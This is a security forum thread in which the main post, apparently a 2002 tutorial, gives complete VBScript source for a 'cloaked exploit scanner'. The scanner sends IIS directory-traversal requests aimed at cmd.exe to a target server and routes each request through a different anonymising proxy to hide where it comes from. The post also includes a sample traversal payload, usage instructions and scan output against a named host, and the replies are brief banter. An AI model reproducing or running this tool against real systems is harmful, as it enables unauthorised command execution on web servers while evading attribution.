Cloaked Exploit Scanner II
Results 1 to 4 of 4

Thread: Cloaked Exploit Scanner II

  1. #1
    Senior Member
    Join Date
    Apr 2002
    Posts
    324

    Cloaked Exploit Scanner II

    Overview

    This is a continuation of my article on writing a Cloaked expliot scanner. In the first part we created a file called 'livehosts' containing a list of responding anonising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.

    If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
    Part I of this document
    Scripting Internet Connections Under Window$
    Search Engine submission 'exploit'
    Google 'exploit' - TCPUtil pt III


    The Exploit File

    Requests that are to be passed through the proxy to a server a listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains requests URLs that the script will try and GET on the traget machine via a proxy.

    For example, the format of a simple traversal exploit would be as follows.

    /.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\
    The script will try each request line in turn, cycling through the list of proxies in the live hosts file.

    Usage

    Usage: scan.vbs [--Target|-t] Ip address or hostname of target
    [--exploitfile|-e] file name to read exploit list from
    [--proxyfile|-p] file name to read live proxies list from
    [--Delay|-d] Page Time Out delay (in seconds) Default: 1 Seconds
    [--Verbose|-v]
    [--debug|-vv]
    [--Help|-?]
    An example

    scan -t www.ntsa.org.uk -e exploit -p livehosts -d 1
    The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehost as the list of live anonising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The Server response is the return code from the server. If the return code is 200 (sucsessful) then you have (in the examples) found a traversal to the command line.

    --Cloaked Exploit Scanner.
    --July 2002 by NTSA.
    --www.ntsa.org.uk

    exploit: HEAD http://www.ntsa.org.uk/.%2e/.%2e/win...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 207.2.54.2
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%2e..%2ewin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 12.34.48.126
    Port: 80
    Server Response> 404
    exploit: HEAD http://www.ntsa.org.uk/..%2f..%2f..%...tem32/cmd.exe?
    /c+dir+c:\ HTTP/1.0
    Proxy: 12.34.48.129
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%2f..%2fwin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 66.64.3.154
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c..%5c..%...innt/system32/
    cmd.exe?/c+dir+c:\ HTTP/1.0
    Proxy: 208.144.37.7
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c..%5cwin...exe?/c+dir+c:\
    HTTP/1.0
    Proxy: 207.35.39.100
    Port: 80
    Server Response> 403
    exploit: HEAD http://www.ntsa.org.uk/..%5c../..%5c.../system32/cmd.
    exe?/c+dir+c:\ HTTP/1.0
    Proxy: 204.60.171.225
    Port: 80
    Server Response> 403
    Registration of the sbwinsock control

    You need to register the sbwinsock.ocx control provided in the zip file at the of this post. To register the OCX component run the following command:

    regsvr32 <path_to_OCX>\<component_name>.OCX
    The Code!

    Code:
    dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
    DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
    Dim oArgs, ArgNum 'Argument vars
    
    Const sckTCPProtocol=0 
    Const sckUDPProtocol=1
    
    const FlgDebug =1
    const flgVerbose =2
    const flgEcho =3
    
    Const ForReading = 1
    const ForWriting = 2
    
    WScript.Echo "--Cloaked Traversal Scanner."
    WScript.Echo "--July 2002 by NTSA."
    WScript.Echo "--www.ntsa.org.uk"
    WScript.Echo ""
    
    'Create a FSO for file I/O operations
    Set fso = CreateObject("Scripting.FileSystemObject")
    'Create the winsock object and pass the event handler tp wsPop_
    on error resume next
    Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
    if err.number > 0 then 
    out "Could not create an instance of the SBWinsck control.",flgEcho
    out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
    out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
    out "is the full path to the ocx file.",flgEcho
    end if
    
    
    GetUserParams
    
    sp = split (proxylist,"|")
    proxycount = cint(sp(0))
    proxy = split(sp(1),",")
    
    ex = split (ExploitList,"|")
    Exploitcount = cint(ex(0))
    Exploit = split(ex(1),",")
    
    px = 0
    
    for n = 0 to Exploitcount -1
    
    sp = split(proxy(px),":")
    host = sp(0)
    port = sp(1)
    
    str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"
    
    out "exploit: " & STR,flgecho
    out "Proxy: " & host,flgecho
    out "Port: " & port,flgecho
    
    tcpClient.Protocol = sckTCPProtocol
    tcpClient.RemoteHost = host 
    tcpClient.RemotePort =  port
    
    tcpClient.Connect
    
    tio = 0
    do until blncon = true or blnskip = true or tio = sdelay *2
    WSCRIPT.SLEEP 250
    out "Waiting for connection...",FlgDebug
    tio = tio + 1
    LOOP
    
    fail = false
    'Timed out - Could not connect
    if tio = sdelay *2 and blnskip =false then 
    out "Could not connect to: " & tcpClient.RemoteHost &_
    " on port: " & tcpClient.RemotePort & ".",FlgEcho
    fail = true
    end if
    
    if fail = false then
    
    tio = 0
    do until blncon = false or tio = sdelay *2
    	WSCRIPT.SLEEP 500
    	out "Waiting for disconnection...",FlgDebug
    	tio = tio + 1
    loop
    
    'Output buffer to screen
    out "Server Response> " & mid(buffer,10,3), Flgecho
    	
    end if
    
    blncon = false
    blnskip = false
    buffer = ""
    
    tcpclient.disconnect
    
    px = px + 1
    if px > proxycount -1 then px = 0	
    
    Set tcpClient=nothing
    Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
    next 
    
    function ProxyList 
    
    dim cnt
    cnt = 0
    
    Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
    do while trim(host) <> "."
    host = livehosts.ReadLine
    if len(trim(host)) > 0 and trim(host) <> "." then
    	proxylist = proxylist & trim(host) & ","
    	cnt = cnt + 1
    end if
    loop
    
    proxylist = cstr(cnt) & "|" & left(proxylist,len(proxylist)-1)
    
    end function
    
    function ExploitList 
    
    dim cnt
    cnt = 0
    
    Set file = fso.OpenTextFile(exploitfile, ForReading)
    
    do while trim(host) <> "."
    host = file.ReadLine
    if len(trim(host)) > 0 and trim(host) <> "." then
    	ExploitList = ExploitList & trim(host) & ","
    	cnt = cnt + 1
    end if
    loop
    
    ExploitList = cstr(cnt) & "|" & left(ExploitList,len(ExploitList)-1)
    
    end function
    
    
    Sub wsPop_DataArrival(Byval b)
    
    dim strdata
    out "Data Arrival...",flgverbose	
    '/* Get the data and add it to the buffer...
    '*/
    tcpClient.GetData strData,vbstring
    
    if blnbuff = true then
    buffer = buffer &  strdata
    else
    out strdata,Flgverbose
    end if
    
    'Data has just arrived - wait some 
    'more to see if anything further comes
    secwait = 100
    blnskip = true
    
    end sub
    
    Sub wsPop_Connected()
    
    blncon = true
    blnskip = true
    out "Connected...",flgverbose
    'sending data to the host
    out "Sending data...",flgverbose
    
    sendandlog str & vbcrlf
    
    out "Data sent.",flgverbose
    
    End Sub
    
    sub sendandlog(data)
    
    tcpclient.SendData data & vbCrLf
    LogDataSend(data)
    
    end sub
    
    
    sub LogDataSend(poststr)
    
    if port = 80 then
    out "Sending:> " & poststr,Flgverbose
    else 
    'out "Sending:> " & poststr,FlgEcho
    end if
    
    end sub
    
    Sub wsPop_Close()
    
    blncon = false
    out "Disconnected...",flgverbose
    
    End Sub
    
    function RemoveDel(str)
    
    RemoveDel = replace(str,"/","")
    RemoveDel = replace(RemoveDel,"-","")
    RemoveDel = replace(RemoveDel,"--","")
    
    end function
    
    function IsEmpty(str)
    
    if str & "" = "" then 
    isempty = true
    else
    isempty = false
    end if
    
    end function
    
    function iCount(str,del)
    
    icount =0
    
    for i = 1 to len(str)
    if mid(str,i,1) = del then
    	icount = icount +1
    end if
    next
    
    icount = icount - 1
    
    end function
    
    function input(quest)
    
    WScript.StdOut.Write(quest & ":>")
    input = WScript.StdIn.ReadLine()
    
    end function
    
    sub out(str,flg)
    
    select case flg
    case flgEcho
    	wscript.echo str
    case flgVerbose
    	if verbose = true or debug = true then
    		wscript.echo str
    	end if
    case FlgDebug
    	if debug = true then
    		wscript.echo str
    	end if
    end select
    end sub
    
    sub GetUserParams
    
    buffset = 0
    
    Set oArgs = WScript.Arguments
    ArgNum = 0
    While ArgNum < oArgs.Count
    
    Select Case RemoveDel(LCase(oArgs(ArgNum)))
    	Case "explotfile","e":
    		ArgNum = ArgNum + 1
    		If (fso.FileExists(oArgs(ArgNum))) Then
    			exploitfile = oArgs(ArgNum)
    		else
    			out "Error! The file " & oArgs(ArgNum) & _
    			" was not found.",FlgEcho
    			out "",FlgEcho
    			displayusage
    			wscript.quit(1)
    		end if
    	Case "proxyfile","p":
    		ArgNum = ArgNum + 1
    		If (fso.FileExists(oArgs(ArgNum))) Then
    			proxyfile = oArgs(ArgNum)
    		else
    			out "Error! The file " & oArgs(ArgNum) & _
    			" was not found.",FlgEcho
    			out "",FlgEcho
    			displayusage
    			wscript.quit(1)
    		end if
    	Case "target","t":
    		ArgNum = ArgNum + 1
    		Target = oArgs(ArgNum)
    	Case "delay","d":
    		ArgNum = ArgNum + 1
    		sdelay = oArgs(ArgNum)
    	Case "help","?":
    		Call DisplayUsage
    	Case "verbose", "v":
    		Verbose = true
    	Case "debug","vv":
    		debug = true
    	Case Else:
    		WScript.Echo "Unknown argument "& oArgs(ArgNum)
    		Call DisplayUsage
    		wscrip.quit(1)
    End Select	
    
    ArgNum = ArgNum + 1
    Wend
    
    blnbuff = true
    buffset = 1
    
    if isempty(sdelay) then
    'Set default as 1 second delay before breaking connection
    sdelay = 1
    end if
    
    if isempty(target) or isempty(exploitfile) or isempty(proxyfile) then
    'Set default as 3 second delay before breaking connection
    out "A target host, a proxy file and exploit file are required.",flgecho
    DisplayUsage
    wscript.quit(1)
    else
    out "target> " & target,flgdebug
    out "exploitfile> " & exploitfile,flgdebug
    out "proxyfile> " & proxyfile,flgdebug
    end if
    
    end sub
    
    Sub DisplayUsage
    
    WScript.Echo "Usage: scan.vbs [--Target|-t]"
    WScript.Echo "        [--exploitfile|-e] file name to read exploit list from"
    WScript.Echo "        [--proxyfile|-p] file name to read live proxies list from"
    WScript.Echo "        [--Delay|-d] Page Time Out delay " & _ 
    		   "(in seconds) Default: 1 Seconds"
    WScript.Echo "        [--Verbose|-v]"
    WScript.Echo "        [--debug|-vv]"
    WScript.Echo "        [--Help|/?]>"
    WScript.Echo ""
    WScript.Quit (1)	
    
    End Sub
    If you enjoyed this thread you may enjoy these others:

    Cloaked Exploit Scanner Part I and Part II
    Google 'exploit' - TCPUtil pt III
    Open Source FTP Control
    Web based classes
    Backing up the IIS metabase.
    What port is that?
    Building your own IDS tripwire.
    Credit card security
    Dumping SQL data to a text file
    Hunting down skript kiddies
    Search Engine submission 'exploit'
    Forced shutdown of a remote nt/2k server
    Securing an installation of IIS 4. (No, seriously)
    Remote DSN Connections, using WinAPIs and the registry
    Scripting Internet Connections Under Window$
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

  2. #2
    Senior Member
    Join Date
    Jun 2002
    Posts
    394
    aRRRRRRRRRRRRGh, another tut!
    thats too many, too soon and containing too much for me, i narrowly averted a buffer overflow when i saw this in the forum.
    is this stuff is just bursting out of your head or what? can you not do something else to relieve the pressure? like knitting, its supposed to be relaxing. or at least just pretend to not know something and write a bad tut remember, some people out here like to think they have a good understanding of the machine!...thanks for making sure that more people actually do understand...me included, naturally.

    .maX
    Hmm...theres something a little peculiar here. Oh i see what it is! the sentence is talking about itself! do you see that? what do you mean? sentences can\'t talk! No, but they REFER to things, and this one refers directly-unambigeously-unmistakably-to the very sentence which it is!

  3. #3
    Senior Member
    Join Date
    Apr 2002
    Posts
    324
    rofl.

    Knitting sounds fun - but I doubt I'd be allowed any sharp objects.
    \"I may not agree with what you say, but I will defend to the death your right to say it.\"
    Sir Winston Churchill.

  4. #4
    Senior Member
    Join Date
    Aug 2001
    Posts
    259
    man that is some poor internal documentation of code if I ever saw it, other than that good job.
    Alternate realities celebrate reality. If you cant handle the reality your in, then you wont be able to handle the one your attempting to escape to.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides